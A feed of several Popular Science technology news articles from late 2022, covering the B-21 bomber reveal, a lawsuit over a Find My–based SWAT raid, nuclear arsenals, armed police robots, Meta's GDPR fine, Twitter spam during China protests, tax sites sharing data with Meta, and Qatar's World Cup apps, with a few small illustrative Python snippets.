The proposed class action lawsuit seeks unspecified damages for owners of iOS or Android devices who have been tracked with an AirTag, or who are at risk of being stalked. Since AirTags’ introduction last year, at least two murders have directly involved the use of Apple’s tracking gadget, according to the lawsuit.

Our first look at the Air Force’s new B-21 stealth bomber was just a careful teaser https://www.popsci.com/technology/b-21-raider-bomber-reveal/ Mon, 05 Dec 2022 22:00:36 +0000 https://www.popsci.com/?p=495172
the B-21 raider bomber
The B-21 Raider was unveiled on Dec. 2. At right is Secretary of Defense Lloyd Austin, who spoke at the event. DOD / Chad J. McNeeley

Northrop Grumman revealed the B-21 Raider in a roll-out ceremony. Here's what we know about it—and what remains hidden.

The post Our first look at the Air Force’s new B-21 stealth bomber was just a careful teaser appeared first on Popular Science.


On Friday, the public finally got a glimpse at the Air Force’s next bomber, the B-21 Raider. Northrop Grumman, which is producing it, rolled out the futuristic flying machine at a ceremony in Palmdale, California, on Dec. 2. It’s a stealthy aircraft, meaning that it’s designed to have a minimal radar signature. It’s also intended to carry both conventional and nuclear weapons. 

The new aircraft will eventually join a bomber fleet that currently consists of three different aircraft types: the old, not-stealthy B-52s, the supersonic B-1Bs, and the B-2 flying wing, which is the B-21’s most direct ancestor. 

Here’s what to know about the B-21 Raider.

The B-21 Raider
The B-21 Raider. US Air Force

A throwback to 1988

At the B-21’s unveiling, the US Secretary of Defense, Lloyd Austin, referred to the new plane as “the first bomber of the 21st century.” Indeed, the bomber models it will eventually replace include the 1980s-era aircraft, the B-2 Spirit. 

As Peter Westwick recounts in his history of low-observable aircraft in the United States, Stealth, two aircraft makers competed against each other to build the B-2. Northrop prevailed against Lockheed to build the stealth bomber, while Lockheed had previously beaten Northrop when it came to creating the first stealth fighter: the F-117. Northrop scored the contract to build the B-2 in late 1981, and rolled out the craft just over seven years later, in 1988. 

The 1988 roll-out event, Westwick writes, included “no fewer than 41 Air Force generals,” and an audience of 2,000 people. “A tractor towed the plane out of the hangar, the crowd went wild, the press snapped photos, and then the tractor pushed it back out of sight,” he writes. It flew for the first time in 1989.

[Related: The B-21 bomber won’t need a drone escort, thank you very much]

Today, the B-2 represents the smallest segment of the US bomber fleet, by the numbers. “We only bought 21 of them,” says Todd Harrison, a defense analyst at Metrea Strategic Insights. “One has crashed, one is used for testing, and at any given time, several others will be in maintenance—so the reality is we have far too few stealthy bombers in our inventory, and the only way to get more was to design and build a whole new bomber.” 

The B-2 Spirit, seen here from a refueling aircraft, in 2012.
The B-2 Spirit, seen here from a refueling aircraft, in 2012. US Air Force / Franklin Ramos

The new bomber

The B-21, when it does fly, will join the old group of bombers. Those planes, such as the B-1, “are really aging, and are hard to keep in the air—they’re very expensive to fly, and they just don’t have the capabilities that we need in the bomber fleet of today and in the future,” Harrison says. The B-52s date to the early 1960s; one B-52 pilot once told Popular Science that being at the controls of that aircraft feels like “flying a museum.” If the B-52 is officially called the Stratofortress, it’s also been called the Stratosaurus. (A likely future scenario is that the bomber fleet eventually becomes just two models: B-52s, which are getting new engines, and the B-21.)

[Related: Inside a training mission with a B-52 bomber, the aircraft that will not die]

With the B-21, the view offered by the unveiling video is just of the aircraft from the front, a brief vision of a futuristic plane. “They’re not likely to reveal the really interesting stuff about the B-21,” observes Harrison. “What’s most interesting is what they can’t show us.” That includes internal as well as external attributes. 

Publicly revealing an aircraft like this represents a calculated decision to show that a capability exists without revealing too much about it. “You want to reveal things that you think will help deter Russia or China from doing things that might provoke us into war,” he says. “But, on the other hand, you don’t want to show too much, because you don’t want to make it easy for your adversary to develop plans and technologies to counter your capabilities.”

Indeed, the way that Secretary of Defense Austin characterized the B-21 on Dec. 2 walked that line. “The B-21 looks imposing, but what’s under the frame, and the space-age coatings, is even more impressive,” he said. He then spoke about its range, stealth attributes, and other characteristics in generalities. (The War Zone, a sibling website to PopSci, has deep analysis on the aircraft here and has interviewed the pilots who will likely fly it for the first time here.)

Mark Gunzinger, the director for future concepts and capability assessments at the Mitchell Institute for Aerospace Studies, says that the B-21 rollout, which he attended, “was very carefully staged.” 

[Related: The stealth helicopters used in the 2011 raid on Osama bin Laden are still cloaked in mystery]

“There were multiple lights on each side of the aircraft that were shining out into the audience,” he recalls. “The camera angles were very carefully controlled, reporters were told what they could and could not do in terms of taking photos, and of course, the aircraft was not rolled out all the way—half of it was still pretty much inside the hangar, so people could not see the tail section.” 

“The one word you heard the most during the presentation from all the speakers was ‘deterrence,'” Gunzinger adds. Part of achieving that is signaling to others that the US has “a credible capability,” but at the same time, “there should be enough uncertainty about the specifics—performance specifics and so forth—so they do not develop effective countermeasures.”

The B-21 rollout concluded with Northrop Grumman’s CEO, Kathy Warden, who mentioned the aircraft’s next big moment. “The next time you see this plane, it’ll be in the air,” she said. “Now, let’s put this plane to bed.” 

And with that, it was pushed back into the hangar, and the doors closed in front of it. 

Watch the reveal video, below.

Colorado police sued over SWAT raid based on ‘Find My’ app screenshot https://www.popsci.com/technology/police-find-my-swat-raid/ Mon, 05 Dec 2022 20:30:00 +0000 https://www.popsci.com/?p=494911
A phone screen showing FindMy app
Apple's 'Find My' feature gives approximate, not exact, locations. Deposit Photos

The ACLU is suing on behalf of 77-year-old Ruby Johnson, claiming that a police officer mischaracterized the accuracy of the app's locator to obtain a search warrant.

The post Colorado police sued over SWAT raid based on ‘Find My’ app screenshot appeared first on Popular Science.


On January 4, 2022, the Denver Police Department (DPD) sent its SWAT team into Ruby Johnson’s home looking for six firearms, two drones, $4,000, and an old iPhone recently reported stolen. For hours, law enforcement armed with automatic weapons scoured the 77-year-old grandmother’s home of four decades. The raid was based on a search warrant citing the iPhone theft victim’s use of Apple’s “Find My” feature, which police claimed pinged Johnson’s address. Police found none of the stolen items, nor the white truck in which they were previously located. Now, Johnson is suing the detective who submitted the search warrant, citing a “‘bare bones’ affidavit that blatantly misrepresented the facts and misled the reviewing judge,” including the supposed accuracy and specific search results of the Find My app. The complaint describes a traumatic raid and damaged property.

[Related: How to track down your lost devices.]

Apple first introduced its “Find My” feature in 2019; it uses location tracking to help pinpoint owners’ potentially missing iPhones, iPads, and AirPods. When enabled, Find My can issue a pinging alarm tone to help locate the items if they are connected to WiFi or a cellular network, and sends an alert to the user’s Apple ID email address. Users can also pull up a device’s approximate location in the Maps app.

Johnson’s lawsuit, filed last week by the Colorado ACLU, states that DPD Detective Gary Staab “claimed the Apple technology demonstrated that the stolen iPhone—and presumably the stolen guns and drones—were inside Ms. Johnson’s house.” As seen in a screenshot of the app included in court documents, Find My showed a large blue circle touching four different blocks and six different properties where the phone may have been located, the complaint explains. The ACLU added: “On the contrary, the app indicated that the phone’s location could not accurately be identified and there was zero basis to single out Ms. Johnson’s home.” The complaint claims that Staab mischaracterized the screenshot to the judge. Johnson’s legal team is seeking compensatory damages, attorneys’ fees, pre- and post-judgment interest, as well as any other relief deemed appropriate by the court.
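The complaint’s point about the blue circle can be made concrete with a toy geometry sketch. The radius, coordinates, and property names below are hypothetical, invented purely to illustrate why every address inside an accuracy circle is an equally plausible location for the phone:

```python
import math

# Illustrative sketch (all numbers hypothetical): model the app's
# blue accuracy circle and count how many properties fall inside it.
accuracy_radius_m = 80.0     # assumed location uncertainty, in meters
circle_center = (0.0, 0.0)   # reported approximate location

# Hypothetical property centroids, in meters from the circle center.
properties = {
    "house_a": (10.0, 20.0),
    "house_b": (-40.0, 30.0),
    "house_c": (60.0, -45.0),
    "house_d": (150.0, 0.0),  # outside the circle
}

def inside(point, center, radius):
    """True if a point lies within the accuracy circle."""
    return math.dist(point, center) <= radius

# Every home inside the circle is an equally plausible location.
candidates = [name for name, p in properties.items()
              if inside(p, circle_center, accuracy_radius_m)]
print(candidates)
```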

[Related: Keep tabs on how much access your computer’s apps have to your system.] 

The ACLU’s statement and complaint cite several issues with Staab’s procedure. Aside from failing to disclose to the judge that the Find My app only offered an approximate location of the iPhone, the DPD detective didn’t attempt to independently corroborate the stolen items’ alleged location ahead of time. “Ms. Johnson’s case is just one example of a larger problem of police obtaining warrants and invading people’s homes based on false information, including—like in this case—when police misrepresent the significance and accuracy of technology,” wrote the ACLU.

A snapshot of the world’s nuclear weapons—and how the numbers are changing https://www.popsci.com/technology/world-nuclear-weapons-numbers/ Mon, 05 Dec 2022 12:00:00 +0000 https://www.popsci.com/?p=494390
An American ballistic missile submarine received supplies from an MV-22 Osprey aircraft in August, 2018.
An American ballistic missile submarine received supplies from an MV-22 Osprey aircraft in August, 2018. US Navy

A new Pentagon report offers a look at how one arsenal is shifting.

The post A snapshot of the world’s nuclear weapons—and how the numbers are changing appeared first on Popular Science.


On November 29, the Department of Defense released its annual report on the military power of China. The document offers a public-facing look at how the military of the United States assesses the only country it truly considers to be a potential rival. Most strikingly, the report suggests that not only is China expanding its nuclear arsenal, but it is potentially on track to field 1,500 nuclear warheads by 2035.

Nuclear warheads are hardly the only measure of a nation’s destructive power, but they’re easily the most eye-catching. China already has the world’s third-largest nuclear arsenal, behind Russia and the United States. 

In the report, the Pentagon estimates China’s arsenal to currently be over 400 warheads. The Federation of American Scientists, which produces an independent assessment of nuclear forces, estimated China’s arsenal at over 350 warheads as of early 2022. Getting to 1,500 warheads by 2035 would require China to produce 85 warheads a year, every year, until then.
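The production-rate figure follows from simple arithmetic on the report’s numbers. A back-of-the-envelope check (Python, illustrative only, assuming the buildup runs from the 2022 estimate to 2035):

```python
# Figures from the Pentagon report: an arsenal of over 400 warheads
# today, projected to reach 1,500 by 2035 (timeline assumed to start
# from the 2022 estimate).
current_warheads = 400
projected_warheads = 1500
years = 2035 - 2022  # 13 years

required_per_year = (projected_warheads - current_warheads) / years
print(round(required_per_year))  # roughly 85 warheads per year
```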

Nuclear numbers

China’s arsenal, while large and growing, is closer in scale to the arsenals of India, Pakistan, the UK, and France. India, for example, is estimated by the Federation to have 160 warheads, while France has 290. (North Korea and Israel, with 20 and 90 warheads, respectively, have the smallest arsenals.) 

These arsenals are all an order of magnitude or two smaller than the 5,428 warheads for the United States, and 5,977 for Russia. That’s a huge difference in scale, with the world’s largest arsenal roughly 300 times as big as the world’s smallest. It’s also a divide largely determined by history. The United States and the Soviet Union, from which Russia inherited its nuclear arsenal, were the first two countries to develop and test atomic weapons, and they did so in the context of the Cold War, after the United States used two atomic bombs at the end of World War II.
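The scale gap can be checked against the Federation of American Scientists estimates quoted in this article (a quick, illustrative calculation; Pakistan is omitted because the piece gives no count for it):

```python
# Warhead estimates cited in this article (Federation of American
# Scientists, early 2022).
arsenals = {
    "Russia": 5977,
    "United States": 5428,
    "China": 350,
    "France": 290,
    "India": 160,
    "Israel": 90,
    "North Korea": 20,
}

largest = max(arsenals.values())   # Russia
smallest = min(arsenals.values())  # North Korea
print(round(largest / smallest))   # 299, i.e. roughly 300 times larger
```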

Importantly, the arsenals of the United States and Russia remain bound by arms control treaties, most crucially the New START treaty. While the US and Russia both maintain thousands of warheads in stockpiles or reserves, they both actively deploy roughly 1,600 warheads each. That’s comparable to the total the Pentagon estimates China to be working towards.

Throughout the Cold War, arsenal increases were driven by advances in technology and changes in strategy. More warheads in more missiles, including missiles that could carry and launch multiple warheads at once, developed as an approach to guaranteeing destruction in the face of developments around sophisticated defenses, like missile interceptors or silos hardened against nuclear attack. New technologies, like the continued development by Russia, China, and the United States of hypersonic weapons, could similarly bend arsenal design to more warheads, ensuring that the missiles launched in an attack can cause sufficient harm upon arrival. 

Launching points

Warheads are the smallest unit of a nuclear arsenal. They are, after all, the part that creates the explosions. But a nuclear warhead on its own is just a threat waiting to be sent somewhere far away. What really determines the effectiveness of warheads is the means available to launch them.

In the United States, there exists what’s known as the nuclear triad: Intercontinental Ballistic Missiles (ICBMs) launched from silos, submarine-launched missiles, and weapons delivered by planes. But even that seemingly simple triad fails to capture the complexity of launch. The United States can fire Air Launched Cruise Missiles with nuclear warheads from bombers, a weapon that travels at a different trajectory than gravity bombs or ballistic missiles.

The Pentagon report outlines China’s platforms across air, sea, and land. Air is covered by China’s existing H-6N bomber class. At sea, China has six operational nuclear-armed submarines, with development expected on a next-generation nuclear-armed submarine this decade. On land, China has both road-mobile missile launcher-erector trucks, which can relocate and launch long-range missiles across the country, and growing silo fields, capable of housing ICBMs underground.

The distribution of warheads across submarines, planes, road-mobile missiles, and silos matters, because it can suggest what kind of nuclear war a country anticipates or wants to deter. Silos are especially notable: like submarines, they are designed to enable retaliation after a first strike, but unlike submarine-launched missiles, silos are deliberately placed to attract incoming attack, diverting enemy firepower away from civilians or military command as a missile sink.

Road-mobile missiles, by contrast, are vulnerable when found, but like submarines and bombers they can be relocated to avoid strikes, with the caveat that they are visible from space. The act of signaling—when one nation uses the position and readiness of nuclear weapons to communicate with other nations indirectly—is tricky, but one of the signs countries look for is obvious mobilization seen in satellite photography. 

Ultimately, the increase in warhead numbers suggests a growing arsenal, though it is hard to know what the end state of that arsenal will be. Producing nuclear weapons is hard, dangerous work. Wielding them, even as a deterrent, is risky as well. 

What is certain, at least, is that the days of talking about Russia and the United States as the world’s predominant nuclear powers may be trending towards an end. Cold War arms control and limitation treaties, which halted and then meaningfully reduced arsenal sizes, were done in the context of two countries agreeing together. Reducing arsenals in the 21st century will likely be a multi-party effort. 

Armed police robots will be a threat to public safety. Here’s why. https://www.popsci.com/technology/armed-police-robots-san-francisco/ Fri, 02 Dec 2022 15:00:00 +0000 https://www.popsci.com/?p=493962
A robot used for explosive ordnance disposal is seen in Qatar in 2017.
A robot used for explosive ordnance disposal is seen in Qatar in 2017. US Air Force / Amy M. Lovgren

A recent vote in San Francisco allows police robots to use lethal force, such as with explosives.

The post Armed police robots will be a threat to public safety. Here’s why. appeared first on Popular Science.


On November 29, San Francisco’s government voted 8 to 3 to authorize the use of lethal weapons by police robots. The vote and authorization, which caught national attention, speaks directly to the real fears and perils regarding the use of robotics and remote-control tools domestically. The vote took place in the context of a 2021 law enacted by California mandating that police get approval from local governing authorities over what equipment it uses and how it does so. 

As the San Francisco Chronicle reported, city Supervisor Aaron Peskin told his colleagues: “There could be an extraordinary circumstance where, in a virtually unimaginable emergency, they might want to deploy lethal force to render, in some horrific situation, somebody from being able to cause further harm,” offering a rationale for why police may want to use a robot to kill.

Police robots are not new, though the acquisition of military-grade robots was bolstered by a program that offered local police departments surplus military goods. Bomb squad robots, used heavily in Iraq and Afghanistan to relocate and safely dispose of roadside bombs, or Improvised Explosive Devices, were offered to police following the drawdowns of US forces from those countries in the 2010s. 

Many of the tools that ultimately end up in police hands first see their debut in military contexts, especially in counter-insurgency or irregular warfare. Rubber bullets, a now-ubiquitous less-lethal police weapon, have their origin in the wooden bullets of British Hong Kong and the rubber bullets of British forces in Northern Ireland. MRAPS, the massive heavy armored vehicles hastily produced to protect soldiers from bombs in Iraq and Afghanistan, have also seen a second post-war life in police forces.

Bomb squad robots are remarkable, in part, because they are a tool for which the military and police applications are the same. A robot with a gripper and a camera, remotely controlled over a long tether, can inspect a suspicious package, sparing a human life in the event of detonation. Police and military bomb squads even train on the robots together, sharing techniques for particularly tricky cases.

San Francisco’s government voted to allow police, with explicit sign-off from “one of two high-ranking SFPD leaders,” to deploy an armed robot with lethal force, reports the San Francisco Chronicle. The Chronicle also notes that “the department said it has no plans to outfit robots with a gun,” instead leaving any killing to explosives mounted on robots.

Past precedent

There is relevant history here: In the early hours of July 8, 2016, police in Dallas outfitted an explosive to a Remotec Andros Mark V-A1 and used it to kill an armed suspect. The night of July 7, the suspected shooter had fired on seven police officers, killing five. Dallas police surrounded the suspect and exchanged gunfire during a five-hour standoff in a parking garage. The Dallas Police Department had operated this particular Remotec Andros bomb squad robot since 2008. 

On that night in July, the police attached a bomb to the robot’s manipulator arm. Operated by remote control, the robot’s bomb killed the suspect, while the lifeless robot made it through the encounter with only a damaged manipulator arm. The robot gripper arms are designed to transport and relocate found explosives to a place where they can be safely detonated, sometimes with charges placed by the robot.

While Dallas was a groundbreaking use of remote-controlled explosives, it fit into a larger pattern of police using human-placed explosives, most infamously the 1985 MOVE bombing by Philadelphia police, in which a helicopter dropped two bombs onto a rowhouse, burning it down along with 65 other houses.

Flash bang grenades are a less-lethal weapon used by police and militaries, creating a bright light and loud sound as a way to incapacitate a person before police officers enter a building. These weapons, which are still explosive, can cause injury on contact with skin, and have set fires, including one that burned a home and killed a teenager in Albuquerque, New Mexico in July 2022.

The authorization to arm robots adds one more category of lethal tools to an institution already permitted to do violence on behalf of the state. 

Remote possibilities

Bomb squad robots, which come in a range of models and can cost well into six figures, are a specialized piece of equipment. They are often tethered, with communications and controls running down a large wire to human operators, ensuring that the robot can be operated despite interference in wireless signals. One of the ways these robots are used is to facilitate negotiations, with a microphone and speaker allowing police to safely talk to a cornered suspect. In 2015, California Highway Patrol used a bomb squad robot to deliver pizza to a knife-armed man standing on a highway overpass, convincing the man to come down.

The possibility that these robots could instead be used to kill, as one was in 2016, makes it harder for the robots to be used for non-violent resolution of crises with armed people. In the Supervisors’ hearing, references were made to both the 2017 Mandalay Bay shooting in Las Vegas and the 2022 school shooting in Uvalde, though each is a problem at best tangentially related to armed robots. In Las Vegas, the shooter was immediately encountered by an armed guard, and when police arrived they were able to breach rooms with explosives they carried. In Uvalde, the use of explosives delivered by robot would only have endangered children, who were already waiting for the excruciatingly and fatally long police response to the shooter.

By allowing police to turn a specialized robot into a weapon, San Francisco is solving for a problem that does not meaningfully exist, and is making a genuinely non-lethal tool into a threat. It also sets a precedent for the arming of other machines, like inexpensive quadcopter drones, increasing the distance between police and suspects without leading to arrests or defused situations. 

The post Armed police robots will be a threat to public safety. Here’s why. appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

A massive data leak just cost Meta $275 million https://www.popsci.com/technology/meta-hack-eu-gdpr/ Tue, 29 Nov 2022 15:20:00 +0000 https://www.popsci.com/?p=492753
Close-up of mouse cursor hovering over Facebook website login page
Over 500 million users' personal info was leaked online last year. Deposit Photos

The EU's General Data Protection Regulation (GDPR) law hits Meta for the second time this year.

The post A massive data leak just cost Meta $275 million appeared first on Popular Science.


Yesterday, a security lapse from 2021 cost Facebook’s parent company, Meta, approximately $275 million, thanks to Irish regulators enforcing the EU’s General Data Protection Regulation (GDPR), a law passed in 2018 meant to better safeguard European consumers’ privacy. Last April, hackers collected over 500 million social media users’ names, locations, and birth dates via a vast data-scraping scheme, then turned around and sold the information on an online hacking forum. This violated the GDPR rule requiring companies to safeguard personal information.

The massive fee is only the latest in a string of heavy financial penalties levied against what was once the world’s most dominant social media site. As The New York Times reports, Ireland’s Data Protection Commission previously fined Meta $400 million in September for its “mistreatment of children’s data,” less than a year after the same authorities charged the company $235 million for various violations related to its messaging service, WhatsApp.

[Related: Meta lays off more than 11,000 employees.]

The EU’s GDPR law is far more restrictive than American legislation when it comes to citizens’ online data privacy. Currently, the US lacks a comprehensive federal data privacy law, although there have been recent pushes for similar regulation. EU law, however, allows for heavier fines that otherwise may not be enacted stateside. Because major tech companies such as Meta, Twitter, and Google all have their EU headquarters in Ireland, Europe often turns to Ireland’s Data Protection Commission for enforcement and penalties.

Last year, Facebook rebranded its parent company as Meta, part of CEO Mark Zuckerberg’s attempt to realize his vision of a “metaverse.” It is currently unknown whether Meta will appeal this week’s verdict, as it has for the previous two decisions, but the newest headache comes within weeks of the company laying off over 11,000 global employees amid what Zuckerberg described as “one of the worst downturns” in the company’s history. Meta’s stock has dropped precipitously in recent months, and the company reported a 50-percent decline in quarterly profits last month. “I want to take accountability for these decisions and for how we got here. I know this is tough for everyone, and I’m especially sorry to those impacted,” Zuckerberg wrote in his letter announcing the layoffs.

Twitter overwhelmed by NSFW spam during protests in China https://www.popsci.com/technology/twitter-moderation-protests/ Mon, 28 Nov 2022 20:30:00 +0000 https://www.popsci.com/?p=492055
People hold sheets of blank paper in protest of COVID restrictions on the mainland as police set up a cordon during a vigil in the central district on November 28, 2022 in Hong Kong, China.
Twitter's decimated moderation department is failing recent real world tests. Anthony Kwan/Getty Images

Countless accounts attempted to flood Twitter with NSFW content to obfuscate crucial news from China. With little moderation, experts argue they succeeded.

The post Twitter overwhelmed by NSFW spam during protests in China appeared first on Popular Science.


As a wave of unprecedented citizen protests over China’s revived “zero COVID” response spread throughout major cities, so did an overwhelming flood of “Not Safe For Work” (NSFW) spam posts from what appear to be countless long-dormant Twitter bot accounts. First highlighted by multiple security researchers over the weekend and subsequently confirmed by The Washington Post this morning, the situation is only the most recent example of Twitter’s dangerously strained oversight and maintenance capabilities in the wake of Elon Musk’s dramatic $44 billion acquisition and internal shakeup last month. Yesterday, Twitter also suffered a largely unflagged proliferation of re-uploaded videos of the deadly 2019 mass shooting at a mosque in Christchurch, New Zealand.

[Related: Former Twitter employees warn of platform’s imminent collapse.]

Since assuming leadership, Musk has more than halved the company’s global workforce, from 7,500 to just over 2,000, a reduction many experts and former employees warn opens up one of the world’s most popular social media platforms to numerous content, engineering, and security issues. As one ex-staffer told WaPo, the staff cuts and department shutterings included the resignation of “all the China influence operations and analysts,” leaving the platform with a massive blind spot in the country.

Overwhelming keyword searches for major cities like Shanghai, Urumqi, and Chengdu with NSFW content makes it much more difficult for people to find reliable, real-time information on developing events in those areas. “50 percent porn, 50 percent protests,” one anonymous US government contractor and China expert described their Twitter feed to WaPo. “Once I got 3 to 4 scrolls into the feed… [it was] all porn.”

[Related: Elon Musk completes purchase of Twitter, fires CEO.]

“Search the name of any major city in Chinese… and you’ll see thousands of nsfw escort ads,” Mengyu Dong, a Stanford University researcher, tweeted on Sunday. Dong explained that, although similar ads have existed for years, they had never been shared as frequently as over this past weekend, and that many of the recent posts came from accounts dormant for years. Analysis from another account specializing in publicly available Chinese data seemed to show that suspected spam accounts at one point comprised over 95 percent of the “Latest” results for a search of “Beijing” in Chinese, adding that, “They tweet at a high, steady rate throughout the day, suggesting automation.”
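The “high, steady rate” heuristic the analyst describes can be made concrete: automated accounts tend to post at near-constant intervals, so the spread of the gaps between their posts is unusually small. A minimal sketch of that idea in Python (the threshold and sample data are illustrative assumptions, not Twitter’s actual detection logic):

```python
from statistics import mean, pstdev

def looks_automated(post_times, cv_threshold=0.15):
    """Flag an account whose inter-post intervals are suspiciously regular.

    post_times: sorted posting timestamps, in seconds.
    A low coefficient of variation (stdev/mean of the gaps) means the
    account posts at a steady, machine-like cadence all day.
    """
    gaps = [b - a for a, b in zip(post_times, post_times[1:])]
    if len(gaps) < 5:  # too few posts to judge
        return False
    cv = pstdev(gaps) / mean(gaps)
    return cv < cv_threshold

# A human posts in bursts with long silences; a spam bot posts
# roughly every 10 minutes around the clock.
human = [0, 40, 55, 3600, 3620, 9000, 9050, 20000]
bot = [i * 600 + (i % 3) for i in range(50)]  # almost perfectly periodic
```

A real classifier would combine this cadence signal with account age, content similarity, and network features, but the regularity test alone already separates the two example timelines.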

On Friday, Musk tweeted screenshots of presentation slides he claimed were from a recent “company talk,” one of which included the caption “Reported impersonation spiked, then fell” alongside a line graph citing “Twitter Internal” data.

Major tax-filing sites routinely shared users’ financial info with Facebook https://www.popsci.com/technology/tax-prep-share-information-facebook/ Tue, 22 Nov 2022 05:00:00 +0000 https://www.popsci.com/?p=489884
Tax form 1040 with crumpled up forms, glasses, pink eraser and pencil
Despite the abuse, the financial landscape provides few alternatives. Deposit Photos

A new investigation reveals how companies share users' most personal financial data with advertisers.

The post Major tax-filing sites routinely shared users’ financial info with Facebook appeared first on Popular Science.


The annual tax season looms large for Americans just after the holidays, and millions will soon turn to the $11 billion third-party filing industry to help make sense of their most recent finances. But a damning new exposé has revealed that some of the most popular tax sites routinely offered customers’ most private financial and personal data to Facebook without their knowledge, thanks to a tiny, nearly ubiquitous piece of surveillance code.

A deep dive from The Markup and The Verge published this morning explains in detail how some of the country’s most popular tax prep software makers, including H&R Block, TaxSlayer, and TaxAct, utilized the popular Meta Pixel tracking tool to amass sensitive data including names, email addresses, incomes, refunds, filing statuses, and even dependents’ college scholarship amounts from annual filings. Designed and made freely available by Facebook, the code embeds a tiny pixel on participating websites that subsequently sends a host of information about visitors’ digital activity to Meta. Both Meta and the businesses that opt in benefit from the tracking, because it allows them to build advertising profiles of consumers while personalizing ads to their supposed tastes. Approximately one-third of the 80,000 most popular websites utilize Meta Pixel (disclosure: PopSci included), and the overall tracking-cookie ecosystem provides the vast majority of revenue for many companies online.

[Related: Hospital patients say a Facebook-linked ad tool violated their privacy.]

However, The Markup‘s most recent investigation into tax filing services’ surveillance presents a particularly egregious and invasive example of data harvesting. For one thing, much of the information amassed by the filing companies isn’t collected under Meta Pixel’s default configuration, meaning that someone affiliated with these businesses purposefully went into the settings to toggle specific information-gathering parameters. For example, pixels embedded by TaxAct and TaxSlayer used something called “automatic advanced matching,” which scans forms for fields potentially containing personally identifiable info like names, phone numbers, and emails, then sends that info to Meta, according to the report. Mandi Matlock, a Harvard Law School lecturer on tax law, told The Markup that its findings reveal taxpayers are “providing some of the most sensitive information that they own, and it’s being exploited,” adding, “This is appalling. It truly is.”
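Meta’s documentation for advanced matching describes sending identifiers as hashes rather than raw text: values like emails and phone numbers are normalized and SHA-256 hashed client-side before transmission. A simplified Python sketch of that normalize-then-hash step (the field names and normalization rules here are pared-down assumptions, not Meta’s exact implementation):

```python
import hashlib

def normalize(field, value):
    """Lowercase and trim identifiers the way client-side matching code
    typically does before hashing (simplified)."""
    value = value.strip().lower()
    if field == "phone":
        # Keep digits only so formatting differences don't matter.
        value = "".join(ch for ch in value if ch.isdigit())
    return value

def hash_for_matching(field, value):
    """SHA-256 the normalized value; only this digest would be sent."""
    return hashlib.sha256(normalize(field, value).encode("utf-8")).hexdigest()

# Two differently formatted entries of the same email yield one digest,
# letting the recipient match them against an existing profile.
a = hash_for_matching("email", "  Jane.Doe@Example.com ")
b = hash_for_matching("email", "jane.doe@example.com")
```

The hashing protects the value in transit, but since the recipient holds the same identifiers, the digest still links the form submission to a known person, which is why the practice raises the concerns described above.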

As the report notes, unfortunately the US financial landscape offers tax filers few alternatives to these third-party companies. The IRS currently only allows free online tax filing through a governmental portal for people earning $73,000 or less per year. While some private services offer similar free filing, they often obfuscate the option to discourage people from selecting it. The combined result leaves many Americans all but forced to pay for these filing services, now with the knowledge that much of their most sensitive data may be harvested by tech companies.

[Related: How data brokers threaten your privacy.]

In a statement provided to PopSci via email, a Meta spokesperson cautioned, “Advertisers should not send sensitive information about people through our Business Tools. Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

Since the joint investigation, several of the surveyed sites have deactivated some of Meta Pixel’s features, according to The Markup. TaxAct, however, continued to send dependents’ names to Facebook, while H&R Block still relayed health savings and college tuition grant amounts. According to legal experts, these services must provide clear and concise consent agreements specifying exactly who receives filing information and how it is used. None of the companies’ privacy agreements mentioned Meta, Facebook, or Google (which also receives some of this data), something Nina Olson, executive director of the nonprofit Center for Taxpayer Rights, argues could be a major regulatory infraction.

“Do they have a list saying they’re going to disclose the refund amounts, and your children, and your whatever to Facebook?” she said. If not, they may be in violation.

Update 11/23/22: The Markup reports that since publishing its report, both H&R Block and TaxAct have removed the Meta Pixel tracking code from their filing websites.

Cybersecurity experts blow the whistle on official apps for World Cup attendees https://www.popsci.com/technology/fifa-2022-world-cup-apps/ Thu, 17 Nov 2022 21:00:00 +0000 https://www.popsci.com/?p=488429
Official Adidas FIFA World Cup soccer ball on green grass in night in stadium
Experts suggest Qatar's World Cup attendees use a burner phone. Deposit Photos

Just days before kickoff, experts are urging World Cup attendees to not use the host Qatar's apps.

The post Cybersecurity experts blow the whistle on official apps for World Cup attendees appeared first on Popular Science.


The FIFA 2022 World Cup is set to begin in a matter of days, but European cybersecurity experts are urging sports fans traveling to Qatar to think twice before downloading the event’s official apps. Authorities from Germany, Norway, and France have all recently issued notices about the nation’s ticket and accommodations app, Hayya, as well as its COVID-19 contact tracing app, Ehteraz, citing the highly suspicious levels of personal data access each requires. According to their Google Play Store listings, Hayya is available under the banner of Qatar’s Supreme Committee for Delivery & Legacy, while Ehteraz is owned by the Ministry of Interior.

Both apps, which Qatar reportedly requires for entry into World Cup events, request private information that far oversteps the European nations’ own regulations regarding fundamental human rights and data protections. The permissions include the ability to amass phone-call metadata, which is often used to pinpoint geographic location, along with other device fingerprints. The apps also keep users’ phones from entering sleep mode, so messaging and phone calls cannot be disabled or silenced. Both Hayya and Ehteraz could potentially transmit phone data to a central server instead of letting it remain locally on devices, making that information susceptible to third-party monitoring.
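Reviews like the ones the German, Norwegian, and French authorities performed boil down to checking an app’s requested permissions against a set regarded as privacy-sensitive. A toy Python illustration (the permission strings are real Android identifiers, but the “sensitive” set and the sample manifest are my own assumptions for the example):

```python
# Permissions a privacy review might treat as sensitive on Android.
SENSITIVE = {
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_PHONE_STATE",   # call metadata, device IDs
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_CONTACTS",
}

def audit(requested):
    """Return the sensitive permissions an app asks for, sorted."""
    return sorted(SENSITIVE & set(requested))

# Hypothetical manifest excerpt for an event app.
manifest = [
    "android.permission.INTERNET",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_PHONE_STATE",
]
flagged = audit(manifest)
```

A real audit would also weigh whether each flagged permission is plausibly needed for the app’s stated purpose, which is exactly the test the regulators say Hayya and Ehteraz fail.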

[Related: Egypt’s official COP27 app may be greenwashed spyware.]

“We are alarmed by the extensive access the apps require,” Norway’s Data Protection Authority said in a statement translated from Norwegian provided by Information Security Media Group, a multimedia company focused on information security, risk management, privacy and fraud. The Data Protection Authority also added that, “There is a real possibility that visitors to Qatar, and especially vulnerable groups, will be monitored by the Qatari authorities.”

As a potential workaround, experts suggest World Cup attendees bring a blank burner phone solely for downloading Hayya and Ehteraz, so as to limit any private data local authorities could potentially access. Information Security Media Group also advises against connecting visitors’ standard phones to open Wi-Fi networks.

